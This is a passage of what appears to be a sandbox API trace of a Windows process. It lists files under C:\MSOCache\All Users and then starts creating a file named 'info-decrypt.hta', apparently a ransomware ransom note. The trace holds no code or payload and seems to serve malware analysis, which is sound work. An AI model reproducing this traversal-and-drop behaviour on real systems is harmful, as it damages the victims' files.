nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0131.345] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0131.345] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0131.345] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0131.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5ec) returned 1 [0131.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5f8) returned 1 [0131.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f62c) returned 1 [0131.345] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x6c0f134, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0131.346] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\", nBufferLength=0x105, lpBuffer=0x6c0f108, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\", lpFilePart=0x0) returned 0x16 [0131.346] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x6c0f354 | out: lpFindFileData=0x6c0f354*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0131.346] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.346] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0131.346] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0131.346] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0131.347] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0131.347] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0131.347] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0131.347] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0131.347] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0131.347] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0131.347] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0131.347] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0131.348] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0131.348] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0131.348] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0131.348] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0131.348] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0131.348] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0131.348] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.348] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0131.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5ec) returned 1 [0131.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5f8) returned 1 [0131.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f5dc) returned 1 [0131.349] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x6c0f0e4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0131.349] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x6c0f0b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0131.349] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6c0f304 | out: lpFindFileData=0x6c0f304*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0131.349] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.349] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0131.350] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0131.350] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0131.350] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0131.350] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.350] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0131.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f59c) returned 1 [0131.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5a8) returned 1 [0131.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f5dc) returned 1 [0131.350] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x6c0f0e4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0131.350] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x6c0f0b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0131.350] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6c0f304 | out: lpFindFileData=0x6c0f304*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0131.351] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.351] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0131.351] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0131.351] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0131.351] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0131.351] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0131.351] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0131.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f59c) returned 1 [0131.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5a8) returned 1 [0131.352] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0131.352] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0131.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0131.352] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0131.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0131.352] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0131.352] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0eef8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0131.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f3ec) returned 1 [0131.352] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" 